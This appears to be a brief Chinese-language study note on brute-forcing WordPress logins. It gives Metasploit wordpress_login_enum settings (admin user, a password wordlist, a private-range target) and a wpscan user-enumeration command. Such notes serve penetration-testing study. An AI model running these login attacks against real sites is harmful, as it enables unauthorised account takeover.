web暴力破解
针对wordpress网站
use auxiliary/scanner/http/wordpress_login_enum 为当前wordpress模块
set username admin 网站用户名
set pass_file /usr/share/wordpress/dirb/common.txt 密码字典位置
set targeturl /secret 网站的后台登录位置所在的路径
set rhots 192.168.1.13 网站ip地址
show options 显示当前的设置项
使用wpscan 工具进行wordpress站点用户名枚举
wpscan --url www.example.com --enumerate u